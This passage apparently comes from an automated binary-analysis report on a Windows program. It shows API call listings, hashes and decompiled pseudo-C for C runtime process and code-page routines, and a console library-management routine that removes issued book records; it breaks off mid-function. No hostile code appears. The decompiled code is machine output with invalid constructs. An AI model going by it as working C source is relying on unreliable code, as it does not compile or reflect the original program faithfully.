                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE824
                                                  • _free.LIBCMT ref: 00AFE82F
                                                  • _free.LIBCMT ref: 00AFE83B
                                                  • _free.LIBCMT ref: 00AFE847
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000000,.com), ref: 00AFE855
                                                  • _free.LIBCMT ref: 00AFE6E1
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00AFE71A
                                                  • _free.LIBCMT ref: 00AFE725
                                                  • _free.LIBCMT ref: 00AFE730
                                                  • _free.LIBCMT ref: 00AFE85E
                                                  • _free.LIBCMT ref: 00AFE86A
                                                  • _free.LIBCMT ref: 00AFE876
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                                  • String ID: .com
                                                  • API String ID: 4143445633-4200470757
                                                  • Opcode ID: 703d4c421301233cf1b4928b307acf5fcf4a8cf80ed575cc6fa2d57ff7091cec
                                                  • Instruction ID: f10e6b8b29015ae56e0400422e4243476d52da459ed3a41f460bfd5c43a53511
                                                  • Opcode Fuzzy Hash: 703d4c421301233cf1b4928b307acf5fcf4a8cf80ed575cc6fa2d57ff7091cec
                                                  • Instruction Fuzzy Hash: 7861597180020CABDF11AFE4CD85AFEBB79EF48311F208166FA15A7161DB358E549BA1
                                                  Uniqueness
                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E00AFE46D(void* __ebx, signed int __edi, void* __esi, WCHAR* _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				intOrPtr _v0;
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				long _v24;
                                                  				long _v28;
                                                  				long _v32;
                                                  				struct _PROCESS_INFORMATION _v48;
                                                  				short _v62;
                                                  				struct _STARTUPINFOW _v116;
                                                  				intOrPtr _v120;
                                                  				intOrPtr* _v240;
                                                  				intOrPtr* _v244;
                                                  				intOrPtr* _v248;
                                                  				intOrPtr* _v252;
                                                  				signed int _t124;
                                                  				void* _t129;
                                                  				intOrPtr* _t130;
                                                  				int _t138;
                                                  				WCHAR* _t139;
                                                  				signed int _t146;
                                                  				intOrPtr* _t152;
                                                  				int _t160;
                                                  				intOrPtr _t161;
                                                  				void* _t171;
                                                  				void* _t197;
                                                  				long _t222;
                                                  				void* _t223;
                                                  				long _t225;
                                                  				void* _t226;
                                                  				long _t236;
                                                  				long _t237;
                                                  				void* _t242;
                                                  				void* _t245;
                                                  				void* _t249;
                                                  				void* _t251;
                                                  				void* _t252;
                                                  				void* _t253;
                                                  				void* _t254;
                                                  
                                                  				if(_a8 == 0) {
                                                  					L1:
                                                  					 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  					return E00AF68BC() | 0xffffffff;
                                                  				}
                                                  				if(_a12 == 0) {
                                                  					goto L1;
                                                  				}
                                                  				if(_a4 > 4) {
                                                  					 *(E00AF69D0()) =  *_t219 & 0x00000000;
                                                  					goto L1;
                                                  				}
                                                  				_push(__ebx);
                                                  				_push(__edi);
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				_t124 = L00B0CFB1(0, __edi, _a12, _a16,  &_v16,  &_v8);
                                                  				_t236 = __edi | 0xffffffff;
                                                  				_t252 = _t251 + 0x10;
                                                  				if(_t124 == _t236) {
                                                  					L00AF4D62(_v8);
                                                  					_v8 = 0;
                                                  					L00AF4D62(_v16);
                                                  					L9:
                                                  					_t197 = _t236;
                                                  					L35:
                                                  					return _t197;
                                                  				}
                                                  				_v12 = 0;
                                                  				_t129 = E00AFEAB6( &_v12,  &_v20, (_t124 & 0xffffff00 | _a4 != 0x00000004) & 0x000000ff);
                                                  				_t253 = _t252 + 0xc;
                                                  				if(_t129 == 0) {
                                                  					L00AF4D62(_v12);
                                                  					_v12 = 0;
                                                  					L00AF4D62(_v8);
                                                  					_v8 = 0;
                                                  					L00AF4D62(_v16);
                                                  					goto L9;
                                                  				}
                                                  				if(_a4 == 4) {
                                                  					_push(8);
                                                  					_pop(0);
                                                  				}
                                                  				_t130 = E00AF69D0();
                                                  				 *_t130 = 0;
                                                  				_t222 = 0x44;
                                                  				E00AD24C0(_t236,  &(_v116.lpReserved), 0, _t222);
                                                  				_t254 = _t253 + 0xc;
                                                  				_v62 = _v20;
                                                  				_v116.hStdInput = _v12;
                                                  				_v116.lpReserved.cb = _t222;
                                                  				_t138 = CreateProcessA(_a8, _v16, 0, 0, 1, 0, _v8, 0,  &(_v116.lpReserved),  &(_v48.hThread));
                                                  				_t223 = _v48.hThread.hProcess;
                                                  				_t242 = _v48.dwProcessId;
                                                  				if(_t138 == 0) {
                                                  					E00AF69AD(GetLastError());
                                                  					if(_t242 != _t236) {
                                                  						CloseHandle(_t242);
                                                  					}
                                                  					if(_t223 != _t236) {
                                                  						CloseHandle(_t223);
                                                  					}
                                                  					L30:
                                                  					L00AF4D62(_v12);
                                                  					_v12 = _v12 & 0x00000000;
                                                  					L00AF4D62(_v8);
                                                  					_v8 = _v8 & 0x00000000;
                                                  					L00AF4D62(_v16);
                                                  					_t197 = _t236;
                                                  					L34:
                                                  					goto L35;
                                                  				}
                                                  				_t139 = _a4;
                                                  				if(_t139 != 2) {
                                                  					if(_t139 != 0) {
                                                  						if(_t139 != 4) {
                                                  							if(_t242 != _t236) {
                                                  								CloseHandle(_t242);
                                                  							}
                                                  							L00AF4D62(_v12);
                                                  							_v12 = _v12 & 0x00000000;
                                                  							L00AF4D62(_v8);
                                                  							_v8 = _v8 & 0x00000000;
                                                  							L00AF4D62(_v16);
                                                  							_t197 = _t223;
                                                  							goto L34;
                                                  						}
                                                  						if(_t242 != _t236) {
                                                  							CloseHandle(_t242);
                                                  						}
                                                  						if(_t223 != _t236) {
                                                  							CloseHandle(_t223);
                                                  						}
                                                  						_t236 = 0;
                                                  						goto L30;
                                                  					}
                                                  					WaitForSingleObject(_t223, _t236);
                                                  					GetExitCodeProcess(_v48.hThread.hProcess,  &_v24);
                                                  					_v28 = _v24;
                                                  					if(_t242 != _t236) {
                                                  						CloseHandle(_t242);
                                                  					}
                                                  					if(_t223 != _t236) {
                                                  						CloseHandle(_t223);
                                                  					}
                                                  					_t236 = _v28;
                                                  					goto L30;
                                                  				}
                                                  				E00AD916E(0);
                                                  				asm("int3");
                                                  				_t249 = _t254;
                                                  				if(_v120 == 0) {
                                                  					L39:
                                                  					 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  					return E00AF68BC() | 0xffffffff;
                                                  				}
                                                  				if(_a8 == 0) {
                                                  					goto L39;
                                                  				}
                                                  				if(_v0 > 4) {
                                                  					 *(E00AF69D0()) =  *_t193 & 0x00000000;
                                                  					goto L39;
                                                  				}
                                                  				_push(_t223);
                                                  				_push(_t236);
                                                  				_v20 = 0;
                                                  				_v12 = 0;
                                                  				_t146 = E00B0D02C(0, _t236, _a8, _a12,  &_v20,  &_v12);
                                                  				_t237 = _t236 | 0xffffffff;
                                                  				if(_t146 == _t237) {
                                                  					L00AF4D62(_v12);
                                                  					_v12 = 0;
                                                  					L00AF4D62(_v20);
                                                  					L47:
                                                  					_t171 = _t237;
                                                  					L73:
                                                  					return _t171;
                                                  				}
                                                  				_v16 = 0;
                                                  				if(E00AFEAB6( &_v16,  &_v24, (_t146 & 0xffffff00 | _v0 != 0x00000004) & 0x000000ff) == 0) {
                                                  					L00AF4D62(_v16);
                                                  					_v16 = 0;
                                                  					L00AF4D62(_v12);
                                                  					_v12 = 0;
                                                  					L00AF4D62(_v20);
                                                  					goto L47;
                                                  				}
                                                  				_push(_t242);
                                                  				if(_v0 == 4) {
                                                  					_push(8);
                                                  					_pop(0);
                                                  				}
                                                  				_t152 = E00AF69D0();
                                                  				 *_t152 = 0;
                                                  				_t225 = 0x44;
                                                  				E00AD24C0(_t237,  &_v116, 0, _t225);
                                                  				_v116.cbReserved2 = _v24;
                                                  				_v116.lpReserved2 = _v16;
                                                  				_v116.cb = _t225;
                                                  				_t160 = CreateProcessW(_a4, _v20, 0, 0, 1, 0x400, _v12, 0,  &_v116,  &_v48);
                                                  				_t226 = _v48.hProcess;
                                                  				_t245 = _v48.hThread;
                                                  				if(_t160 == 0) {
                                                  					E00AF69AD(GetLastError());
                                                  					if(_t245 != _t237) {
                                                  						CloseHandle(_t245);
                                                  					}
                                                  					if(_t226 != _t237) {
                                                  						CloseHandle(_t226);
                                                  					}
                                                  					L68:
                                                  					L00AF4D62(_v16);
                                                  					_v16 = _v16 & 0x00000000;
                                                  					L00AF4D62(_v12);
                                                  					_v12 = _v12 & 0x00000000;
                                                  					L00AF4D62(_v20);
                                                  					_t171 = _t237;
                                                  					L72:
                                                  					goto L73;
                                                  				}
                                                  				_t161 = _v0;
                                                  				if(_t161 != 2) {
                                                  					if(_t161 != 0) {
                                                  						if(_t161 != 4) {
                                                  							if(_t245 != _t237) {
                                                  								CloseHandle(_t245);
                                                  							}
                                                  							L00AF4D62(_v16);
                                                  							_v16 = _v16 & 0x00000000;
                                                  							L00AF4D62(_v12);
                                                  							_v12 = _v12 & 0x00000000;
                                                  							L00AF4D62(_v20);
                                                  							_t171 = _t226;
                                                  							goto L72;
                                                  						}
                                                  						if(_t245 != _t237) {
                                                  							CloseHandle(_t245);
                                                  						}
                                                  						if(_t226 != _t237) {
                                                  							CloseHandle(_t226);
                                                  						}
                                                  						_t237 = 0;
                                                  						goto L68;
                                                  					}
                                                  					WaitForSingleObject(_t226, _t237);
                                                  					GetExitCodeProcess(_v48,  &_v28);
                                                  					_v32 = _v28;
                                                  					if(_t245 != _t237) {
                                                  						CloseHandle(_t245);
                                                  					}
                                                  					if(_t226 != _t237) {
                                                  						CloseHandle(_t226);
                                                  					}
                                                  					_t237 = _v32;
                                                  					goto L68;
                                                  				}
                                                  				E00AD916E(0);
                                                  				asm("int3");
                                                  				_push(_t249);
                                                  				return L00B0CFB1(_t226, _t237,  *_v252,  *_v248,  *_v244,  *_v240);
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00B0CFB1: _free.LIBCMT ref: 00B0CFD3
                                                  • _free.LIBCMT ref: 00AFE4DE
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,?,?,?,?,?), ref: 00AFE580
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE590
                                                  • __dosmaperr.LIBCMT ref: 00AFE597
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5A2
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5AD
                                                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5C7
                                                  • GetExitCodeProcess.KERNEL32 ref: 00AFE5D4
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5E5
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE5F0
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE605
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE610
                                                  • _free.LIBCMT ref: 00AFE61B
                                                  • _free.LIBCMT ref: 00AFE627
                                                  • _free.LIBCMT ref: 00AFE633
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00AFE641
                                                  • _free.LIBCMT ref: 00AFE4D3
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00AFE50C
                                                  • _free.LIBCMT ref: 00AFE517
                                                  • _free.LIBCMT ref: 00AFE522
                                                  • _free.LIBCMT ref: 00AFE64A
                                                  • _free.LIBCMT ref: 00AFE656
                                                  • _free.LIBCMT ref: 00AFE662
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                                  • String ID:
                                                  • API String ID: 4143445633-0
                                                  • Opcode ID: 15bbac893596f2c45cc2653f6fb509c405cc9fd1ee7b699691a7760151ce3e2b
                                                  • Instruction ID: b8d5c57091c623503065c3f87327689d1701ca5c6aa03c166194a20b1957d8d4
                                                  • Opcode Fuzzy Hash: 15bbac893596f2c45cc2653f6fb509c405cc9fd1ee7b699691a7760151ce3e2b
                                                  • Instruction Fuzzy Hash: DE515D7180020CEFDF22AFE0CD85AFEBB79EF44311F208166FA15A6161DB354E549B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00B1939D(intOrPtr* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                  				void* _t5;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t15;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t30;
                                                  				void* _t31;
                                                  				void* _t34;
                                                  				void* _t35;
                                                  				void* _t37;
                                                  				void* _t42;
                                                  				intOrPtr _t45;
                                                  				void* _t46;
                                                  				intOrPtr* _t50;
                                                  				void* _t52;
                                                  				void* _t55;
                                                  				void* _t57;
                                                  				intOrPtr* _t58;
                                                  				void* _t60;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				void* _t65;
                                                  				void* _t69;
                                                  				void* _t71;
                                                  
                                                  				_t58 = __esi;
                                                  				_t53 = __edx;
                                                  				_t52 = __ecx;
                                                  				_t50 = __ebx;
                                                  				_push("cls");
                                                  				E00AE3965(__ebx, __edx, __edi, __esi);
                                                  				_t63 = _t62 + 4;
                                                  				_t55 = 0xc;
                                                  				do {
                                                  					0xb27e6c->X = 0x5000a;
                                                  					_t5 =  *_t50(0xfffffff5, 0xb27e6c->X);
                                                  					 *_t58();
                                                  					E00AD1080(_t52, "Enter book id to remove:", _t5);
                                                  					E00AD10F0(_t52, 0xb22be0, _t60 - 0xc);
                                                  					 *0xb27f2c = L00AD9D57("Issue.dat", "rb+");
                                                  					_t11 = E00AF1525(0xb27ec0, 0x6c, 1, _t10);
                                                  					_t65 = _t63 + 0x24;
                                                  					if(_t11 == 1) {
                                                  						do {
                                                  							_t26 =  *0xb27ec0; // 0x0
                                                  							_t79 = _t26 -  *((intOrPtr*)(_t60 - 0xc));
                                                  							if(_t26 !=  *((intOrPtr*)(_t60 - 0xc))) {
                                                  								__eflags =  *0xb27e9c - 0x74;
                                                  								if( *0xb27e9c != 0x74) {
                                                  									goto L12;
                                                  								} else {
                                                  									goto L5;
                                                  								}
                                                  							} else {
                                                  								E00B17A40(_t53);
                                                  								 *0xb27e9c = 0x74;
                                                  								L5:
                                                  								0xb27e6c->X = 0xc000a;
                                                  								_t31 =  *_t50(0xfffffff5, 0xb27e6c->X);
                                                  								 *_t58();
                                                  								E00AD1080(_t52, "Do You Want to Remove it?(Y/N)", _t31);
                                                  								_t69 = _t65 + 4;
                                                  								_t34 = E00AF4817(_t53, _t58, _t79);
                                                  								_t80 = _t34 - 0x79;
                                                  								if(_t34 == 0x79) {
                                                  									_t35 = L00AD9D57("record.dat", "wb+");
                                                  									_push( *0xb27f2c);
                                                  									_t57 = _t35;
                                                  									E00AE3A34(_t53, _t80);
                                                  									_t37 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
                                                  									_t71 = _t69 + 0x1c;
                                                  									if(_t37 == 1) {
                                                  										do {
                                                  											_t45 =  *0xb27ec0; // 0x0
                                                  											if(_t45 !=  *((intOrPtr*)(_t60 - 0xc))) {
                                                  												E00ADA900(_t53,  *0xb27f2c, 0, 1);
                                                  												L00AE3D2F(0xb27ec0, 0x6c, 1, _t57);
                                                  												_t71 = _t71 + 0x1c;
                                                  											}
                                                  											_t46 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
                                                  											_t71 = _t71 + 0x10;
                                                  											_t83 = _t46 - 1;
                                                  										} while (_t46 == 1);
                                                  									}
                                                  									E00ADA516(_t52, _t53, _t83);
                                                  									E00ADA516(_t52, _t53, _t83);
                                                  									E00ADA59A("Issue.dat");
                                                  									E00AE3970(_t83, "record.dat", "Issue.dat");
                                                  									0xb27e6c->X = 0xe000a;
                                                  									_t42 =  *_t50(0xfffffff5, 0xb27e6c->X, _t57,  *0xb27f2c);
                                                  									 *_t58();
                                                  									E00AD1080(_t52, "The issued book is removed from list", _t42);
                                                  									_t69 = _t71 + 0x18;
                                                  									_t55 = 0xc;
                                                  								}
                                                  								if( *0xb27e9c != 0x74) {
                                                  									L12:
                                                  									0xb27e6c->X = 0xf000a;
                                                  									_t27 =  *_t50(0xfffffff5, 0xb27e6c->X);
                                                  									 *_t58();
                                                  									E00AD1080(_t52, "No Record Found", _t27);
                                                  									_t69 = _t65 + 4;
                                                  								}
                                                  							}
                                                  							_t30 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
                                                  							_t65 = _t69 + 0x10;
                                                  							_t85 = _t30 - 1;
                                                  						} while (_t30 == 1);
                                                  					}
                                                  					0xb27e6c->X = 0x10000a;
                                                  					_t12 =  *_t50(0xfffffff5, 0xb27e6c->X);
                                                  					 *_t58();
                                                  					E00AD1080(_t52, "Delete any more?(Y/N)", _t12);
                                                  					_t63 = _t65 + 4;
                                                  					_t15 = E00AF4817(_t53, _t58, _t85);
                                                  					_t86 = _t15 - 0x79;
                                                  				} while (_t15 == 0x79);
                                                  				0xb27e6c->X = 0x12000a;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  				_push(0xb2327c);
                                                  				E00AD1080(_t52);
                                                  				E00AF4817(_t53, _t58, _t86);
                                                  				L00B18C00(_t52, _t53, _t86);
                                                  				0xb27e6c->X = 0x1e0001;
                                                  				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  				_push(" Press ENTER to return to main menu");
                                                  				E00AD1080(_t52);
                                                  				do {
                                                  				} while (E00AF4817(_t53, _t58, _t86) != 0xd);
                                                  				return E00B1A4D0(_t50, _t52, _t53, _t55, _t58);
                                                  			}
                                                  Instruction address range for the listing above: 0x00b1939d - 0x00b19635

                                                  APIs
                                                  • __fread_nolock.LIBCMT ref: 00B19400
                                                  • __fread_nolock.LIBCMT ref: 00B19496
                                                  • __fread_nolock.LIBCMT ref: 00B194E0
                                                  • __fread_nolock.LIBCMT ref: 00B19588
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A68
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A71
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A97
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A9A
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17ACD
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17AD0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B195DC
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B195DF
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1960A
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1960D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Press ENTER to return to main menu$Delete any more?(Y/N)$Do You Want to Remove it?(Y/N)$Enter book id to remove:$Issue.dat$No Record Found$The issued book is removed from list$cls$rb+$record.dat$wb+
                                                  • API String ID: 2024444707-2290346939
                                                  • Opcode ID: 03d36633d3cda0db3f8ef4dc2e9fc5b9c407cbadd96db6e84f9ebf604698bd5e
                                                  • Instruction ID: 305669bd97552a7070fa992b4afcb0361d94336ae09f496c0fcd35e87fa0086f
                                                  • Opcode Fuzzy Hash: 03d36633d3cda0db3f8ef4dc2e9fc5b9c407cbadd96db6e84f9ebf604698bd5e
                                                  • Instruction Fuzzy Hash: B3515772DC8290B6EA3077E0BD47F6A3A89DB15B50F0041D1F11A523F2DEA299918B77
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E00B03A46(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                  				signed int _v8;
                                                  				char _v22;
                                                  				struct _cpinfo _v28;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				void* _v40;
                                                  				intOrPtr* _v44;
                                                  				signed int* _v48;
                                                  				signed int* _v52;
                                                  				signed int _v56;
                                                  				void* _v60;
                                                  				signed int* _v64;
                                                  				intOrPtr _v68;
                                                  				intOrPtr _v72;
                                                  				intOrPtr* _v76;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				void* _v88;
                                                  				char _v92;
                                                  				signed int _t112;
                                                  				signed int _t134;
                                                  				signed short _t137;
                                                  				signed int _t138;
                                                  				void* _t141;
                                                  				void* _t145;
                                                  				void* _t148;
                                                  				short* _t149;
                                                  				intOrPtr _t150;
                                                  				void* _t151;
                                                  				signed int _t154;
                                                  				intOrPtr* _t155;
                                                  				signed char _t172;
                                                  				short* _t177;
                                                  				signed char _t180;
                                                  				signed int _t181;
                                                  				void* _t183;
                                                  				signed int _t185;
                                                  				signed int* _t187;
                                                  				short* _t189;
                                                  				void* _t197;
                                                  				signed int _t198;
                                                  				signed int _t205;
                                                  				signed char* _t206;
                                                  				signed int* _t209;
                                                  				signed char* _t210;
                                                  				signed int _t211;
                                                  				intOrPtr _t214;
                                                  				void* _t215;
                                                  				signed int* _t225;
                                                  				intOrPtr* _t227;
                                                  				signed int* _t228;
                                                  				intOrPtr* _t232;
                                                  				intOrPtr _t233;
                                                  				signed int _t234;
                                                  				void* _t235;
                                                  				void* _t236;
                                                  
                                                  				_t112 =  *0xb26018; // 0xb47fd95f
                                                  				_v8 = _t112 ^ _t234;
                                                  				_t227 = _a4;
                                                  				_t185 = 0;
                                                  				_v76 = _t227;
                                                  				_v32 = 0;
                                                  				_t190 =  *((intOrPtr*)(_t227 + 0xa8));
                                                  				_v36 = 0;
                                                  				_v40 = 0;
                                                  				_v60 = 0;
                                                  				_v92 = _t227;
                                                  				_v88 = 0;
                                                  				if( *((intOrPtr*)(_t227 + 0xa8)) == 0) {
                                                  					__eflags =  *(_t227 + 0x8c);
                                                  					if( *(_t227 + 0x8c) != 0) {
                                                  						asm("lock dec dword [eax]");
                                                  					}
                                                  					 *(_t227 + 0x8c) = _t185;
                                                  					__eflags = 0;
                                                  					 *(_t227 + 0x90) = _t185;
                                                  					 *_t227 = 0xb1e6b8;
                                                  					 *((intOrPtr*)(_t227 + 0x94)) = 0xb1e938;
                                                  					 *((intOrPtr*)(_t227 + 0x98)) = 0xb1eab8;
                                                  					 *((intOrPtr*)(_t227 + 4)) = 1;
                                                  					L41:
                                                  					return L00AD1DCD(_v8 ^ _t234);
                                                  				}
                                                  				_t117 = _t227 + 8;
                                                  				_v44 = 0;
                                                  				if( *(_t227 + 8) != 0) {
                                                  					L3:
                                                  					_v44 = E00AF4F03(_t190, 1, 4);
                                                  					L00AF4D62(_t185);
                                                  					_v32 = E00AF4F03(_t190, 0x180, 2);
                                                  					L00AF4D62(_t185);
                                                  					_v36 = E00AF4F03(_t190, 0x180, 1);
                                                  					L00AF4D62(_t185);
                                                  					_v40 = E00AF4F03(_t190, 0x180, 1);
                                                  					L00AF4D62(_t185);
                                                  					_t214 = E00AF4F03(_t190, 0x101, 1);
                                                  					_v60 = _t214;
                                                  					L00AF4D62(_t185);
                                                  					_t236 = _t235 + 0x3c;
                                                  					if(_v44 == _t185 || _v32 == _t185 || _t214 == 0 || _v36 == _t185 || _v40 == _t185) {
                                                  						L36:
                                                  						L00AF4D62(_v44);
                                                  						L00AF4D62(_v32);
                                                  						L00AF4D62(_v36);
                                                  						L00AF4D62(_v40);
                                                  						_t185 = 1;
                                                  						__eflags = 1;
                                                  						goto L37;
                                                  					} else {
                                                  						_t134 = _t185;
                                                  						do {
                                                  							 *(_t134 + _t214) = _t134;
                                                  							_t134 = _t134 + 1;
                                                  						} while (_t134 < 0x100);
                                                  						if(GetCPInfo( *(_t227 + 8),  &_v28) == 0) {
                                                  							goto L36;
                                                  						}
                                                  						_t137 = _v28;
                                                  						if(_t137 > 5) {
                                                  							goto L36;
                                                  						}
                                                  						_t138 = _t137 & 0x0000ffff;
                                                  						_v56 = _t138;
                                                  						if(_t138 <= 1) {
                                                  							L19:
                                                  							_t34 = _t214 + 1; // 0x1
                                                  							_t141 = E00B09613(_t214, _t227, _t257, _t185,  *((intOrPtr*)(_t227 + 0xa8)), 0x100, _t34, 0xff, _v36 + 0x81, 0xff,  *(_t227 + 8), _t185);
                                                  							_t236 = _t236 + 0x24;
                                                  							_t258 = _t141;
                                                  							if(_t141 == 0) {
                                                  								goto L36;
                                                  							}
                                                  							_t39 = _t214 + 1; // 0x1
                                                  							_t145 = E00B09613(_t214, _t227, _t258, _t185,  *((intOrPtr*)(_t227 + 0xa8)), 0x200, _t39, 0xff, _v40 + 0x81, 0xff,  *(_t227 + 8), _t185);
                                                  							_t236 = _t236 + 0x24;
                                                  							_t259 = _t145;
                                                  							if(_t145 == 0) {
                                                  								goto L36;
                                                  							}
                                                  							_v80 = _v32 + 0x100;
                                                  							_t148 = L00B04B10(_t185, 0xff, _t214, _t227, _t259, _t185, 1, _t214, 0x100, _v32 + 0x100,  *(_t227 + 8), _t185);
                                                  							_t236 = _t236 + 0x1c;
                                                  							if(_t148 == 0) {
                                                  								goto L36;
                                                  							}
                                                  							_t215 = _v32;
                                                  							_t149 = _t215 + 0xfe;
                                                  							 *_t149 = 0;
                                                  							_t197 = _v40;
                                                  							_v84 = _t149;
                                                  							_t150 = _v36;
                                                  							_t228 = _t197 + 0x80;
                                                  							_v52 = _t228;
                                                  							 *(_t150 + 0x7f) = _t185;
                                                  							_t209 = _t150 + 0x80;
                                                  							 *(_t197 + 0x7f) = _t185;
                                                  							 *_t209 = _t185;
                                                  							_v48 = _t209;
                                                  							 *_t228 = _t185;
                                                  							if(_v56 <= 1) {
                                                  								L32:
                                                  								_t198 = 0x3f;
                                                  								_t151 = memcpy(_t215, _t215 + 0x200, _t198 << 2);
                                                  								_push(0x1f);
                                                  								_push(0x1f);
                                                  								asm("movsw");
                                                  								memcpy(_t151, _t151 + 0x100, 0 << 2);
                                                  								asm("movsw");
                                                  								asm("movsb");
                                                  								_t154 = memcpy(_v40, _v40 + 0x100, 0 << 2);
                                                  								asm("movsw");
                                                  								asm("movsb");
                                                  								_t232 = _v76;
                                                  								if( *((intOrPtr*)(_t232 + 0x8c)) != 0) {
                                                  									asm("lock xadd [ecx], eax");
                                                  									if((_t154 | 0xffffffff) == 0) {
                                                  										L00AF4D62( *((intOrPtr*)(_t232 + 0x90)) - 0xfe);
                                                  										L00AF4D62( *((intOrPtr*)(_t232 + 0x94)) - 0x80);
                                                  										L00AF4D62( *((intOrPtr*)(_t232 + 0x98)) - 0x80);
                                                  										L00AF4D62( *((intOrPtr*)(_t232 + 0x8c)));
                                                  									}
                                                  								}
                                                  								_t155 = _v44;
                                                  								 *_t155 = 1;
                                                  								 *((intOrPtr*)(_t232 + 0x8c)) = _t155;
                                                  								 *_t232 = _v80;
                                                  								 *((intOrPtr*)(_t232 + 0x90)) = _v84;
                                                  								 *((intOrPtr*)(_t232 + 0x94)) = _v48;
                                                  								 *((intOrPtr*)(_t232 + 0x98)) = _v52;
                                                  								 *(_t232 + 4) = _v56;
                                                  								L37:
                                                  								L00AF4D62(_v60);
                                                  								goto L41;
                                                  							}
